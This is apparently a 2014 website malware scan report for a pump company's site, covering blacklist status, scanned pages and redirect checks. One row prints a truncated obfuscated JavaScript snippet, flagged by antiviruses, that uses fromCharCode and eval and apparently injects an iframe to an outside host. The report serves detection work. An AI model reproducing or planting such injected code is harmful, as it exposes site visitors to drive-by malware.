Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pumpactioncorp.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pumpactioncorp.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pumpactioncorp.com/ | 200 OK Content-Length: 4571 Content-Type: text/html | suspicious |
Suspicious code found <img src="http://localhost/" > | ||
http://pumpactioncorp.com/scripts.js | 200 OK Content-Length: 1043 Content-Type: application/x-javascript | clean |
http://pumpactioncorp.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/x-javascript | clean |
http://pumpactioncorp.com/legal/disclaimer.pdf | 200 OK Content-Length: 45291 Content-Type: application/pdf | clean |
http://pumpactioncorp.com/test404page.js | 404 Not Found Content-Length: 1255 Content-Type: text/html | clean |
http://pumpactioncorp.com/products.html | 200 OK Content-Length: 5441 Content-Type: text/html | clean |
http://pumpactioncorp.com/pdf/AWS-0914_Delivery_lines_system.pdf | 200 OK Content-Length: 300480 Content-Type: application/pdf | clean |
http://pumpactioncorp.com/app_mining.html | 200 OK Content-Length: 5878 Content-Type: text/html | clean |
http://pumpactioncorp.com/app_coal.html | 200 OK Content-Length: 5977 Content-Type: text/html | clean |
http://pumpactioncorp.com/app_municipal.html | 200 OK Content-Length: 5767 Content-Type: text/html | clean |
http://pumpactioncorp.com/app_bioenergy.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://pumpactioncorp.com/app_industrial.html | 200 OK Content-Length: 5939 Content-Type: text/html | clean |
http://pumpactioncorp.com/app_dredging.html | 200 OK Content-Length: 5853 Content-Type: text/html | clean |
http://pumpactioncorp.com/services.html | 200 OK Content-Length: 4511 Content-Type: text/html | clean |
http://pumpactioncorp.com/services2.html | 200 OK Content-Length: 7872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,65,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,65,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5a,59,72,59,59,6a,5a,6a,59,5c,5e,67,6a,5c,26,5b,67,26,6d,63,27,5b,64,63,26,68,60,68,1f,33,5,2 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pumpactioncorp.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 18:35:07 GMT
Accept-Ranges: bytes
ETag: "48b8045-11db-4de570f79bc80"
Server: Webserver
Content-Length: 4571
Content-Type: text/html
Last-Modified: Tue, 04 Jun 2013 17:03:30 GMT
X-Powered-By: PleskLin
...4571 bytes of data.
GET / HTTP/1.1
Host: pumpactioncorp.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 18:35:07 GMT
Accept-Ranges: bytes
ETag: "48b8045-11db-4de570f79bc80"
Server: Webserver
Content-Length: 4571
Content-Type: text/html
Last-Modified: Tue, 04 Jun 2013 17:03:30 GMT
X-Powered-By: PleskLin
...4571 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pumpactioncorp.com
Referer: http://www.google.com/search?q=pumpactioncorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pumpactioncorp.com
Referer: http://www.google.com/search?q=pumpactioncorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.